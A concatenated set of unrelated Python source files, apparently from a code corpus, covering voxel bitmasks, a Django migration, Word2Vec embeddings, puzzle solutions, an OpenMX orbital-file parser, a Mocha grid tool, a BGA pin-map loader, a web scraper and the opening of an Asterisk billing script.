mask_to_2x2x2[idx0] = (m000|m010|m001|m011|m100|m110|m101|m111,i,j,k)
idx0 += 1
mask_to_1x2x2[idx1+0] = (m000|m010|m001|m011,i ,j ,k )
mask_to_1x2x2[idx1+1] = (m100|m110|m101|m111,i+1,j ,k )
mask_to_2x1x2[idx1+0] = (m000|m100|m001|m101,i ,j ,k )
mask_to_2x1x2[idx1+1] = (m010|m110|m011|m111,i ,j+1,k )
mask_to_2x2x1[idx1+0] = (m000|m100|m010|m110,i ,j ,k )
mask_to_2x2x1[idx1+1] = (m001|m101|m011|m111,i ,j ,k+1)
idx1 += 2
mask_to_2x1x1[idx2+0] = (m000|m100,i ,j ,k )
mask_to_2x1x1[idx2+1] = (m010|m110,i ,j+1,k )
mask_to_2x1x1[idx2+2] = (m001|m101,i ,j ,k+1)
mask_to_2x1x1[idx2+3] = (m011|m111,i ,j+1,k+1)
mask_to_1x2x1[idx2+0] = (m000|m010,i ,j ,k )
mask_to_1x2x1[idx2+1] = (m100|m110,i+1,j ,k )
mask_to_1x2x1[idx2+2] = (m001|m011,i ,j ,k+1)
mask_to_1x2x1[idx2+3] = (m101|m111,i+1,j ,k+1)
mask_to_1x1x2[idx2+0] = (m000|m001,i ,j ,k )
mask_to_1x1x2[idx2+1] = (m100|m101,i+1,j ,k )
mask_to_1x1x2[idx2+2] = (m010|m011,i ,j+1,k )
mask_to_1x1x2[idx2+3] = (m110|m111,i+1,j+1,k )
idx2 += 4
mask_to_i2_j2[idx3+0] = (m000|m100|m001|m011,i ,j ,k ,i ,j ,k+1)
mask_to_i2_j2[idx3+1] = (m000|m100|m101|m111,i ,j ,k ,i+1,j ,k+1)
mask_to_i2_j2[idx3+2] = (m010|m110|m001|m011,i ,j+1,k ,i ,j ,k+1)
mask_to_i2_j2[idx3+3] = (m010|m110|m101|m111,i ,j+1,k ,i+1,j ,k+1)
mask_to_i2_j2[idx3+4] = (m001|m101|m000|m010,i ,j ,k+1,i ,j ,k )
mask_to_i2_j2[idx3+5] = (m001|m101|m100|m110,i ,j ,k+1,i+1,j ,k )
mask_to_i2_j2[idx3+6] = (m011|m111|m000|m010,i ,j+1,k+1,i ,j ,k )
mask_to_i2_j2[idx3+7] = (m011|m111|m100|m110,i ,j+1,k+1,i+1,j ,k )
mask_to_i2_k2[idx3+0] = (m000|m100|m010|m011,i ,j ,k ,i ,j+1,k )
mask_to_i2_k2[idx3+1] = (m000|m100|m110|m111,i ,j ,k ,i+1,j+1,k )
mask_to_i2_k2[idx3+2] = (m010|m110|m000|m001,i ,j+1,k ,i ,j ,k )
mask_to_i2_k2[idx3+3] = (m010|m110|m100|m101,i ,j+1,k ,i+1,j ,k )
mask_to_i2_k2[idx3+4] = (m001|m101|m010|m011,i ,j ,k+1,i ,j+1,k )
mask_to_i2_k2[idx3+5] = (m001|m101|m110|m111,i ,j ,k+1,i+1,j+1,k )
mask_to_i2_k2[idx3+6] = (m011|m111|m000|m001,i ,j+1,k+1,i ,j ,k )
mask_to_i2_k2[idx3+7] = (m011|m111|m100|m101,i ,j+1,k+1,i+1,j ,k )
mask_to_j2_k2[idx3+0] = (m000|m010|m100|m101,i ,j ,k ,i+1,j ,k )
mask_to_j2_k2[idx3+1] = (m000|m010|m110|m111,i ,j ,k ,i+1,j+1,k )
mask_to_j2_k2[idx3+2] = (m100|m110|m000|m001,i+1,j ,k ,i ,j ,k )
mask_to_j2_k2[idx3+3] = (m100|m110|m010|m011,i+1,j ,k ,i ,j+1,k )
mask_to_j2_k2[idx3+4] = (m000|m011|m100|m101,i ,j ,k+1,i+1,j ,k )
mask_to_j2_k2[idx3+5] = (m000|m011|m110|m111,i ,j ,k+1,i+1,j+1,k )
mask_to_j2_k2[idx3+6] = (m101|m111|m000|m001,i+1,j ,k+1,i ,j ,k )
mask_to_j2_k2[idx3+7] = (m101|m111|m010|m011,i+1,j ,k+1,i ,j+1,k )
idx3 += 8
calc_mask_to_xxxxx()
class packed_cuboids(list):
def __init__(self):
list.__init__(self)
self.extend([0]*64)
def add( self, i, j, k ):
assert( 0 <= i <= 15 and 0 <= j <= 15 and 0 <= k <= 15 )
self[ijk2b_to_idx0_63(i>>2,j>>2,k>>2)] |= 1<<ijk2b_to_idx0_63(i&3,j&3,k&3)
def sub( self, i, j, k ):
assert( 0 <= i <= 15 and 0 <= j <= 15 and 0 <= k <= 15 )
idx = ijk2b_to_idx0_63(i>>2,j>>2,k>>2)
mask = 1<<ijk2b_to_idx0_63(i&3,j&3,k&3)
if self[idx] & mask == 0: return False
else:
self[idx] &= ~mask
return True
def get( self, i, j, k ):
assert( 0 <= i <= 15 and 0 <= j <= 15 and 0 <= k <= 15 )
return self[ijk2b_to_idx0_63(i>>2,j>>2,k>>2)] & (1<<ijk2b_to_idx0_63(i&3,j&3,k&3)) != 0
class cuboids_level(list):
def __init__( self, bits=8 ):
list.__init__(self)
self.extend([None]*64)
self.bits = bits
def add( self, i, j, k ):
idx = ijk2b_to_idx0_63(i>>self.bits,j>>self.bits,k>>self.bits)
if self[idx] is None:
if self.bits == 4: self[idx] = packed_cuboids()
else : self[idx] = cuboids_level(self.bits-2)
mask = (1<<self.bits)-1
self[idx].add( i&mask, j&mask, k&mask )
def sub( self, i, j, k ):
idx = ijk2b_to_idx0_63(i>>self.bits,j>>self.bits,k>>self.bits)
if self[idx] is None: return False
else:
mask = (1<<self.bits)-1
return self[idx].sub( i&mask, j&mask, k&mask )
def get( self, i, j, k ):
idx = ijk2b_to_idx0_63(i>>self.bits,j>>self.bits,k>>self.bits)
if self[idx] is None: return False
else:
mask = (1<<self.bits)-1
return self[idx].get( i&mask, j&mask, k&mask )
def compact(self):
empty = 0
if self.bits == 4:
for idx,cs in enumerate(self):
if cs is not None:
if not any(mask for mask in cs): self[idx] = cs = None
if cs is None: empty += 1
else:
for idx,cs in enumerate(self):
if cs is not None:
if cs.compact(): self[idx] = cs = None
if cs is None: empty += 1
return empty == len(self)
def items(self):
if self.bits == 4:
for idx,cs in enumerate(self):
if cs is not None:
i,j,k = idx0_63_to_ijk2b(idx)
yield ( (i<<4,j<<4,k<<4), cs )
else:
for idx,cs1 in enumerate(self):
if cs1 is not None:
i,j,k = idx0_63_to_ijk2b(idx)
i <<= self.bits
j <<= self.bits
k <<= self.bits
for ijk,cs in cs1.items():
yield ( (i+ijk[0],j+ijk[1],k+ijk[2]), cs )
| 1.929688
| 2
|
offers/migrations/0002_alter_emailipo_data_sent.py
|
ccunhafinance/sistema
| 0
|
12783504
|
<reponame>ccunhafinance/sistema
# Generated by Django 3.2.5 on 2021-08-11 15:12
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('offers', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='emailipo',
name='data_sent',
field=models.DateTimeField(default=django.utils.timezone.now, editable=False),
),
]
| 1.40625
| 1
|
src/features/skip_gram.py
|
RausellLab/tiresias
| 6
|
12783505
|
import numpy as np
from gensim.models import Word2Vec
from src.utils import io
def run(
random_walk_files, output_file, dimensions=128, context_size=10, epochs=1, workers=1
):
"""Generates node vector embeddings from a list of files containing random
walks performed on different layers of a multilayer network.
Parameters
----------
random_walk_files: list
List of files containing random walks. Each file should correspond to random walks perform on a different layer
of the network of interest.
output_file: str
The file in which the node embeddings will be saved.
dimensions: int (default: 128)
Number of dimensions of the generated vector embeddings.
context_size: int (default: 10)
Context size in Word2Vec.
epochs: int (default: 1)
Number of epochs in stochastic gradient descent.
workers: int (default: 1)
Number of worker threads used to train the model.
"""
walks = np.concatenate([io.read_random_walks(file) for file in random_walk_files])
#print(walks.shape)
walks_trim = np.split(walks, walks.shape[0])
walks_trim = [walk[walk!=0].astype(str).tolist() for walk in walks]
#print(walks_trim)
model = Word2Vec(
walks_trim,
size=dimensions,
window=context_size,
min_count=0,
sg=1, # use skip-gram
workers=workers,
iter=epochs,
)
model.wv.save_word2vec_format(output_file)
| 3.0625
| 3
|
greedy/basic/leetcode/F1282/Solution.py
|
ashtishad/problem-solving
| 17
|
12783506
|
<reponame>ashtishad/problem-solving<filename>greedy/basic/leetcode/F1282/Solution.py
# problem name: Group the People Given the Group Size They Belong To
# problem link: https://leetcode.com/problems/group-the-people-given-the-group-size-they-belong-to/
# contest link: (?)
# time: (?)
# author: ratul14
# other_tags: (?)
# difficulty_level: medium
class Solution:
def groupThePeople(self, groupSizes: List[int]) -> List[List[int]]:
ans = list()
gs = groupSizes
def proc(gs: List[int]) -> any:
if set(gs) == {-1}:
return
itm = 0
for i in gs:
if i == -1:
continue
else:
itm = i
break
tmpl = list()
for _ in [0]*itm:
idx = gs.index(itm)
tmpl.append(idx)
gs[idx] = -1
ans.append(tmpl)
proc(gs)
proc(gs)
return ans;
| 3.4375
| 3
|
src/bromine/utils/wait.py
|
Etiqa/bromine
| 2
|
12783507
|
<reponame>Etiqa/bromine
from selenium.webdriver.support.ui import WebDriverWait
class Wait(WebDriverWait):
def __init__(self, *args, **kwargs):
super(Wait, self).__init__(None, *args, **kwargs)
def until(self, method, message=''):
return super(Wait, self).until(lambda _: method(), message)
def until_not(self, method, message=''):
return super(Wait, self).until_not(lambda _: method(), message)
| 2.625
| 3
|
python_challenges/project_euler/p034_digit_factorials.py
|
bruckhaus/challenges
| 1
|
12783508
|
import math
__author__ = 'tilmannbruckhaus'
class DigitFactorials:
"""
Digit factorials
Problem 34
145 is a curious number, as 1! + 4! + 5! = 1 + 24 + 120 = 145.
Find the sum of all numbers which are equal to the sum of the factorial of their digits.
Note: as 1! = 1 and 2! = 2 are not sums they are not included.
"""
def __init__(self):
pass
@staticmethod
def find(n):
d = DigitFactorials
digit_factorial_sum = 0
for i in range(3, n):
if d.is_digit_factorial(i):
if __name__ == '__main__':
print "found digit factorial:", i
digit_factorial_sum += i
if __name__ == '__main__':
if i % 1000000 == 0:
print i
return digit_factorial_sum
@staticmethod
def is_digit_factorial(i):
factorial_sum = 0
for digit in str(i):
factorial_sum += math.factorial(int(digit))
return factorial_sum == i
if __name__ == '__main__':
d = DigitFactorials.find(10000000)
print "The sum of all numbers which are equal to the sum of the factorial of their digits is", d
| 3.9375
| 4
|
GUI_tools/OpenMX_orbitals/PAO_parser.py
|
Hiroaki-Tanaka-0606/calcPSF
| 1
|
12783509
|
<reponame>Hiroaki-Tanaka-0606/calcPSF
# PAO_parser
# read .pao files (before or after optimized)
import re
import numpy as np
import math
import Config
class PAO_parser:
def __init__(self, filePath, optimized):
# variables
self.number_optpao=0
self.grid_output=0
self.maxL_pao=0
self.num_pao=0
self.PAO_Lmax=0
self.PAO_Mul=0
self.CCoes=None
self.PAOs=None
self.x=None
self.r=None
self.OrthNorm=None
self.valence_min=[]
# read contraction coefficients, grid.num.output, number.vps, <pseudo.NandL>
# read maxL.pao, num.pao
# read PAO.Lmax(=maxL.pao), PAO.Mul(=num.pao), pseudo.atomic.orbitals
with open(filePath, "r") as f:
# number.optpao
while optimized:
line=f.readline()
re_result=re.findall(r"number\.optpao\s*(\d+)", line)
if len(re_result)>0:
self.number_optpao=int(re_result[0])
print(("number.optpao is {0:d}").format(self.number_optpao))
break
re_result=re.findall(r"^\s*Input file\s*$", line)
if len(re_result)>0:
print("Warning: number.optpao is not found")
break
ccoes=[]
# Contraction.coefficients
for cindex in range(1, self.number_optpao+1):
while len(re.findall(r"<Contraction.coefficients"+str(cindex), line))==0:
line=f.readline()
num_rows=int(f.readline())
for lindex in range(0, num_rows):
line=f.readline()
re_result=re.findall(r"^\s+Atom=\s*\d+\s*"+\
r"L=\s*(\d+)\s*"+\
r"Mul=\s*\d+\s*"+\
r"p=\s*(\d+)\s*"+\
r"([0-9\.\-]+)", line)
if len(re_result)==0:
print("Error in parsing Contraction.coefficients")
return
ccoes.append([int(re_result[0][0]),\
int(re_result[0][1]),\
float(re_result[0][2])])
line=f.readline()
if len(re.findall(r"Contraction.coefficients"+str(cindex)+">", line))==1:
print(("Reading contraction coefficients {0:d} finished").format(cindex))
else:
print("Error in reading Contraction.coefficients")
return
# grid.num.output
while True:
line=f.readline()
re_result=re.findall(r"grid\.num\.output\s*(\d+)", line)
if len(re_result)>0:
self.grid_output=int(re_result[0])
print(("grid.num.output is {:d}").format(self.grid_output))
break
if len(line)==0:
print("Error: cannot find grid.num.output")
return
# number.vps
number_vps=-1
while True:
line=f.readline()
re_result=re.findall(r"number\.vps\s*(\d+)", line)
if len(re_result)>0:
number_vps=int(re_result[0])
print(("number.vps is {:d}").format(number_vps))
break
if len(line)==0:
print("Error: cannot find number.vps")
return
# <pseudo.NandL>
pseudo_NL=[]
maxL=-1
while True:
line=f.readline()
re_result=re.findall(r"<pseudo.NandL", line)
if len(re_result)>0:
for i in range(0, number_vps):
line=f.readline()
re_result=re.findall(r"\s*\d+\s*(\d+)\s*(\d+)", line)
if len(re_result)>0:
pseudo_NL.append([int(re_result[0][0]), int(re_result[0][1])])
if maxL<int(re_result[0][1]):
maxL=int(re_result[0][1])
line=f.readline()
re_result=re.findall("pseudo.NandL>", line)
if len(re_result)==0:
print("Error in pseudo.NandL")
return
for l in range(0, maxL+1):
self.valence_min.append(-1)
for data in pseudo_NL:
if self.valence_min[data[1]]<0 or self.valence_min[data[1]]>data[0]:
self.valence_min[data[1]]=data[0]
break
# maxL.pao
while True:
line=f.readline()
re_result=re.findall(r"maxL\.pao\s*(\d+)", line)
if len(re_result)>0:
self.maxL_pao=int(re_result[0])
print(("maxL.pao is {:d}").format(self.maxL_pao))
break
if len(line)==0:
print("Error: cannot find maxL.pao")
return
# num.pao
while True:
line=f.readline()
re_result=re.findall(r"num\.pao\s*(\d+)", line)
if len(re_result)>0:
self.num_pao=int(re_result[0])
print(("num.pao is {:d}").format(self.num_pao))
break
if len(line)==0:
print("Error: cannot find num.pao")
return
# PAO.Lmax
while True:
line=f.readline()
re_result=re.findall(r"PAO.Lmax\s*(\d+)", line)
if len(re_result)>0:
self.PAO_Lmax=int(re_result[0])
print(("PAO.Lmax is {:d}").format(self.PAO_Lmax))
if self.PAO_Lmax!=self.maxL_pao:
print("Error: maxL.pao!=PAO.Lmax")
return
break
if len(line)==0:
print("Error: cannot find PAO.Lmax")
return
# PAO.Mul
while True:
line=f.readline()
re_result=re.findall(r"PAO\.Mul\s*(\d+)", line)
if len(re_result)>0:
self.PAO_Mul=int(re_result[0])
print(("PAO.Mul is {:d}").format(self.PAO_Mul))
if self.PAO_Mul!=self.num_pao:
print("Error: num.pao!=PAO_Mul")
return
break
if len(line)==0:
print("Error: cannot find PAO_Mul")
return
# put contraction coefficients in numpy
self.CCoes=np.zeros((self.PAO_Lmax+1, self.PAO_Mul, self.PAO_Mul))
Mul_indices=[]
for i in range(0,self.PAO_Lmax+1):
Mul_indices.append(-1)
for j in range(0, self.PAO_Mul):
self.CCoes[i][j][j]=1
for ccoe in ccoes:
if ccoe[1]==0:
Mul_indices[ccoe[0]]+=1
i=Mul_indices[ccoe[0]]
self.CCoes[ccoe[0]][i][ccoe[1]]=ccoe[2]
self.OrthNorm=np.zeros((self.PAO_Lmax+1, self.PAO_Mul, self.PAO_Mul))
# for mat in self.CCoes:
# print(mat)
# pseudo atomic orbitals
self.x=np.zeros((self.grid_output,))
self.r=np.zeros((self.grid_output,))
self.PAOs=np.zeros((self.PAO_Lmax+1, self.PAO_Mul, self.grid_output))
for l in range(0, self.PAO_Lmax+1):
while True:
line=f.readline()
re_result=re.findall(r"<pseudo\.atomic\.orbitals\.L="+str(l), line)
if len(re_result)>0:
break
if len(line)==0:
print("Error: cannot find pseudo atomic orbitals")
return
for i in range(0, self.grid_output):
line_arr=f.readline().split()
try:
self.x[i]=float(line_arr[0])
self.r[i]=float(line_arr[1])
for j in range(0, self.PAO_Mul):
self.PAOs[l][j][i]=float(line_arr[j+2])
except Exception as e:
print(e)
return
line=f.readline()
re_result=re.findall(r"pseudo.atomic.orbitals.L="+str(l)+">", line)
if len(re_result)>0:
print(("Reading pseudo atomic orbitals L= {0:d} finished").format(l))
# Gram-Schmidt orthonormalization
if optimized:
for l, CCoe_mat in enumerate(self.CCoes):
for i in range(1, self.PAO_Mul):
for j in range(0, i):
# orthogonalization
norm=np.dot(CCoe_mat[i], CCoe_mat[j])
CCoe_mat[i]-=norm*CCoe_mat[j]
# normalization
norm2=np.dot(CCoe_mat[i], CCoe_mat[i])
CCoe_mat[i]/=math.sqrt(norm2)
# print(("Orthonormalized contraction coefficients for L= {0:d}").format(l))
# for i in range(0, self.PAO_Mul):
# for j in range(0, self.PAO_Mul):
# print(("{0:7.4f} ").format(CCoe_mat[i][j]), end="")
#
# print("")
# print("")
# Orthonormalization check of orbitals
for l in range(0, self.PAO_Lmax+1):
for i in range(0, self.PAO_Mul):
for j in range(0, i+1):
norm=0.0
for k in range(0, self.grid_output-1):
norm+=self.PAOs[l][i][k]*self.PAOs[l][j][k]*math.pow(self.r[k], 2)*(self.r[k+1]-self.r[k])
self.OrthNorm[l][i][j]=norm
self.OrthNorm[l][j][i]=norm
def calcContraction(after, before, matrix):
Lmax=after.PAO_Lmax
Mul1=after.PAO_Mul
Mul2=before.PAO_Mul
grid=after.grid_output
for l in range(0, Lmax+1):
for i in range(0, Mul1):
for j in range(0, Mul2):
norm1=0.0
norm2=0.0
for k in range(0, grid-1):
norm1+=after.PAOs[l][i][k]*before.PAOs[l][j][k]*math.pow(before.r[k],2)*(before.r[k+1]-before.r[k])
norm2+=before.PAOs[l][j][k]*before.PAOs[l][j][k]*math.pow(before.r[k],2)*(before.r[k+1]-before.r[k])
matrix[l][i][j]=norm1/norm2
def reproducePAO(before, ccoes, reproduced):
Lsize=len(ccoes)
Mul1=len(ccoes[0])
Mul2=before.PAO_Mul
for l in range(0, Lsize):
for i in range(0, Mul1):
for j in range(0, Mul2):
reproduced[l][i]+=before.PAOs[l][j]*ccoes[l][i][j]
def normCheck(PAO, AO):
Lmax=PAO.PAO_Lmax
valence_min=PAO.valence_min
Mul=PAO.PAO_Mul
grid=PAO.grid_output
for Mul_PAO in range(0, Mul):
for l in range(0, Lmax+1):
Mul_AO=Mul_PAO+(valence_min[l]-(l+1) if len(valence_min)>l else 0)
norm1=0.0
norm2=0.0
for k in range(round(grid*0.9), grid-1):
norm1+=PAO.PAOs[l][Mul_PAO][k]*AO.AOs[l][Mul_AO][k]*math.pow(PAO.r[k],2)*(PAO.r[k+1]-PAO.r[k])
norm2+=PAO.PAOs[l][Mul_PAO][k]*PAO.PAOs[l][Mul_PAO][k]*math.pow(PAO.r[k],2)*(PAO.r[k+1]-PAO.r[k])
if norm1/norm2<Config.invert_criterion:
print(("{0:d}{1:s} in AO is inverted, norm={2:.3f}").format(Mul_AO+l+1, Config.azimuthal[l], norm1/norm2))
AO.AOs[l][Mul_AO]*=-1
def reproduceAO(AO, PAO, ccoes, reproduced):
Lsize=len(ccoes)
Mul1=len(ccoes[0])
Mul2=PAO.PAO_Mul
for l in range(0, Lsize):
for i in range(0, Mul1):
for j in range(0, Mul2):
Mul_AO=j+(PAO.valence_min[l]-(l+1) if len(PAO.valence_min)>l else 0)
reproduced[l][i]+=AO.AOs[l][Mul_AO]*ccoes[l][i][j]
| 2.609375
| 3
|
src/models/items/item.py
|
prajesh-ananthan/web-store
| 0
|
12783510
|
__author__ = "<NAME>"
class Item(object):
def __init__(self, name, price, url):
self.name = name
self.price = price
self.url = url
def __repr__(self):
return "<Item {} with url: {}".format(self.name, self.url)
| 3.359375
| 3
|
create_grid_layers.py
|
boris-fx/mocha-scripts
| 6
|
12783511
|
# BSD 3-Clause License
#
# Copyright (c) 2020, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from mocha.project import *
import sys
import ast
from collections import OrderedDict
import shiboken2
from PySide2.QtCore import QCoreApplication
from PySide2.QtWidgets import *
app = QApplication.instance()
widgets = app.allWidgets()
class GridLayers(QDialog):
def __init__(self, parent=None):
QDialog.__init__(self, parent)
self._widgets = dict()
self.create_widgets()
self.create_layout()
self.create_connections()
def create_widgets(self):
self._widgets['num_x'] = QLineEdit(self)
self._widgets['num_y'] = QLineEdit(self)
self._widgets['ok'] = QPushButton("OK", self)
self._widgets['cancel'] = QPushButton("Cancel", self)
def create_layout(self):
main_layout = QGridLayout(self)
form_layout = QFormLayout(self)
form_layout.addRow("Number in X:", self._widgets['num_x'])
form_layout.addRow("Number in Y:", self._widgets['num_y'])
main_layout.addLayout(form_layout, 0, 0, 3, 3)
main_layout.addWidget(self._widgets['ok'], 3, 1)
main_layout.addWidget(self._widgets['cancel'], 3, 2)
self.setLayout(main_layout)
def create_connections(self):
self._widgets['ok'].clicked.connect(self.create_grid)
self._widgets['cancel'].clicked.connect(self.reject)
def create_layer(self, proj, clip, width, height, x, y):
x_points = (
XControlPointData(corner=True, active=True, x=float(width * x), y=float(height * y), edge_width=0.0,
edge_angle_ratio=0.5,
weight=0.0),
XControlPointData(corner=True, active=True, x=float(width * x), y=float((height * y) + height),
edge_width=0.0, edge_angle_ratio=0.5,
weight=0.0),
XControlPointData(corner=True, active=True, x=float((width * x) + width), y=float((height * y) + height),
edge_width=0.0, edge_angle_ratio=0.5,
weight=0.0),
XControlPointData(corner=True, active=True, x=float((width * x) + width), y=float(height * y),
edge_width=0.0, edge_angle_ratio=0.5,
weight=0.0),
)
x_layer = proj.add_layer(clip, name=("cell" + str(x) + str(y)), view=0, frame_number=0)
x_layer.add_xspline_contour(0, x_points)
x_layer.parameter(["Track", "TrackingModel"]).set(3, time=0, view=View(0)) # turn shear off
print(x_layer.parameter(["Track", "TrackingModel"]).keyframes) # turn shear off
def create_grid(self):
proj = get_current_project()
if not proj:
self.reject()
num_x = int(self._widgets['num_x'].text())
num_y = int(self._widgets['num_y'].text())
first_clip = proj.default_trackable_clip
clip_size = proj.clips[first_clip.name].frame_size
cell_width = int(clip_size[0] / num_x)
cell_height = int(clip_size[1] / num_y)
# build layers from bottom of frame to top
for y in range(num_y - 1, -1, -1):
for x in range(0, num_x):
self.create_layer(proj, first_clip, cell_width, cell_height, x, y)
self.accept()
if __name__ == "__main__":
grid = GridLayers()
grid.show()
| 1.226563
| 1
|
part_map/object.py
|
jdpatt/bga_color_map
| 2
|
12783512
|
"""Class representing the object being modeled."""
import json
import logging
import re
from pathlib import Path
from typing import Dict, List, Tuple, Union
from natsort import natsorted
from openpyxl import load_workbook
class PartObject:
""" Load and create a part from a source """
def __init__(self, pins, filename):
super().__init__()
self.log = logging.getLogger("partmap.object")
self._pins = pins
self._columns, self._rows = self.sort_and_split_pin_list()
self.filename = Path(filename)
@classmethod
def from_excel(cls, filename):
""" Import an Excel and create a PartObject """
number = "Number"
name = "Name"
workbook = load_workbook(filename)
sheet = workbook.active # Grab the first sheet
try:
column = get_col_index([number, name], sheet)
bga = dict()
for excel_row in range(2, sheet.max_row + 1):
pin = sheet.cell(row=excel_row, column=column[number]).value
net = sheet.cell(row=excel_row, column=column[name])
if pin is not None or net.value is not None:
if net.fill.patternType == "solid":
bga.update(
{
pin: {
"name": net.value,
"color": str("#" + net.fill.start_color.rgb[2:]),
}
}
)
else:
bga.update({pin: {"name": net.value, "color": "#ffffff"}})
except (TypeError, ValueError, KeyError, UnboundLocalError) as error:
print(error)
raise
return cls(bga, filename)
@classmethod
def from_telesis(cls, filename, refdes):
""" Import a Telesis formatted file and create a PartObject """
with open(filename, "r") as tel_file:
tel_text = tel_file.readlines()
tel_netlist = dict()
for line in tel_text:
reg = re.match(r"(.*);", line)
reg2 = re.findall(refdes + r"\.([a-zA-Z0-9]+)", line)
if reg and reg2:
net = reg.group(1)
for reg_match in reg2:
pin = reg_match
tel_netlist.update({pin: {"name": net, "color": "#ffffff"}})
return cls(tel_netlist, filename)
@classmethod
def from_json(cls, filename):
""" Import a json file with a format {pin: {name:, color:}} """
return cls(json.load(open(filename)), filename)
def add_pin(self, pin: str, net: str, color: str) -> None:
"""Add a new pin to the part.
Args:
pin: The Pin Number. (A12)
net: The functional name of the net. (USB_P)
color: The color to fill with.
"""
self._pins.update({pin: {"name": net, "color": color}})
@property
def columns(self) -> List:
""" Get the columns in a part. [1-n] """
return self._columns
@columns.setter
def columns(self, new_columns):
"""Update the columns."""
self._columns = new_columns
@property
def rows(self) -> List:
""" Get the rows in a part. [A - AZ] """
return self._rows
@rows.setter
def rows(self, new_rows):
"""Update the rows."""
self._rows = new_rows
def get_pin(self, prefix: str, suffix: str) -> Union[str, None]:
""" Get the name and color of a pin """
pin = None
if prefix + suffix in self._pins:
pin = self._pins[prefix + suffix]
elif suffix + prefix in self._pins:
pin = self._pins[suffix + prefix]
return pin
@property
def pins(self):
""" Return the pin names """
return self._pins.keys()
def get_number_of_pins(self):
""" Return how many pins are in the part """
return len(self._pins)
def get_net_names(self):
""" Return the net names """
return self._pins.values()["name"]
def dump_json(self):
""" Dump the PartObject dictionary to a .json file """
save_file = self.filename.with_suffix(".json")
self.log.info(f"Saved as json to {save_file}")
with open(save_file, "w") as outfile:
json.dump(self._pins, outfile, sort_keys=True, indent=4, separators=(",", ": "))
def sort_and_split_pin_list(self) -> Tuple[List, List]:
""" Take a list of pins and spilt by letter and number then sort """
r_list: List = list()
c_list = list()
for pin in self.pins:
split_pin = re.split(r"(\d+)", pin)
if split_pin[0] not in r_list:
r_list.append(split_pin[0])
c_list.append(split_pin[1])
temp = list()
temp2 = list()
for item in r_list:
if len(item) > 1:
temp.append(item)
else:
temp2.append(item)
temp2 = natsorted(temp2)
temp2.extend(natsorted(temp))
return natsorted(set(c_list)), temp2
def get_col_index(name: List, worksheet) -> Dict:
""" return a list of the column numbers if it matches """
indexes = dict()
for rows in worksheet.iter_rows(min_row=1, max_row=1, min_col=1):
for column in rows:
if column.value in name:
indexes.update({column.value: column.col_idx})
return indexes
| 2.859375
| 3
|
WebTree.py
|
Tinka8ell/Prayers-and-Readings
| 0
|
12783513
|
<reponame>Tinka8ell/Prayers-and-Readings
# parse html
# Read a requested web page into a "tree" and parse it.
#
# Requires a url and will take an optional dictionary of values
# to be sent as parameters on the HTTP GET.
from datetime import date
import os
from pathlib import Path
import re
import urllib.parse
import urllib.request # as Request
from bs4 import BeautifulSoup # used to parse values into the url
from dateutil.parser import parse
class WebTree:
"""
Read a requested web page into a "tree" and parse it.
Requires a url and will take an optional dictionary of values
to be sent as parameters on the HTTP GET.
"""
def __init__(self, url, values=None):
# unknown if this is used or not or even why it is here ...
self.directory = "/var/www/html"
self.prefix = "http://piweb/"
# known code ...
self.url = url
self.values = values
self.data = None
if values:
data = urllib.parse.urlencode(values)
self.data = data.encode('utf-8') # data should be bytes
self.root = None
self.root = self.read() # root of the tree
self.parse() # use the overrideable parse() method to process it.
return
def read(self):
url = self.url
data = self.data # could be None if no headers passed
# create a bunch of headers so we don't look too robot like
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/79.0.3945.88 "
"Safari/537.36"
req = urllib.request.Request(url, headers=headers, data=data)
with urllib.request.urlopen(req) as f:
g = f.read().decode('utf-8')
# generate element tree
root = BeautifulSoup(g, 'html.parser')
return root
def parse(self):
"""
Default is to do nothing, but should be overridden by subclasses.
"""
return
def show(self):
"""
Basic display function for debugging.
"""
print("url:", self.url)
print("values:", self.values)
return
if __name__ == "__main__":
# simple test of a known source page
tree = WebTree("https://www.moravian.org/the-daily-texts/")
tree.show()
| 3.375
| 3
|
agi_ast/turbobil.py
|
roramirez/turbobil
| 5
|
12783514
|
#!/usr/bin/env python
'Turbobil agi Asterisk'
__author__ = "<NAME>"
__version__ = "0.1.2"
__email__ = "<EMAIL>"
import os
import sys
from turbodb import *
import logging
from agi import *
from dialer import *
#Type pay
PRE_PAY = 1
POST_PAY = 2
# INFO, DEBUG, WARNING, CRITICAL, ERROR
def set_logging(cfg_level=logging.INFO):
logging.basicConfig(level=cfg_level)
logFormatter = logging.Formatter("%(asctime)s [%(threadName)s] [%(levelname)s] %(message)s")
rootLogger = logging.getLogger()
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
logger = logging.getLogger(__name__)
def check_credit(customer):
""" Check customer credit """
if customer.type_pay == PRE_PAY:
if customer.credit <= 0:
logging.info('customer id %s dont have credit' % customer.id)
sys.exit()
elif customer.type_pay == POST_PAY:
